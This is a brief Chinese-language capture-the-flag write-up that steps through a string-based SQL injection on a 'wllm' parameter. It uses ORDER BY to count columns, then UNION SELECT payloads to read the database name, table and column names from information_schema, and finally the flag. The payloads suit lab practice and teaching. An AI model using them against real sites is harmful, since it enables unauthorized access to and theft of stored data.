1.获取环境,要求输入点东西
2.参数是wllm,首先输入?wllm=1,出现以下界面,说明回显正常
3.首先输入?wllm=1',出现报错,说明为字符型漏洞.
4.分别输入 ?wllm=1’ order by 3--+ ?wllm=1’ order by 4--+
发现不存在4列,存在3列
5.输入?wllm=-1' union select 1,2,3--+查看回显
6.输入?wllm=-1' union select 1,2,database()--+
查看数据库
7.输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
查看test_db的表
8.输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段
9. 输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+
查看flag的字段,得到密码,解题完成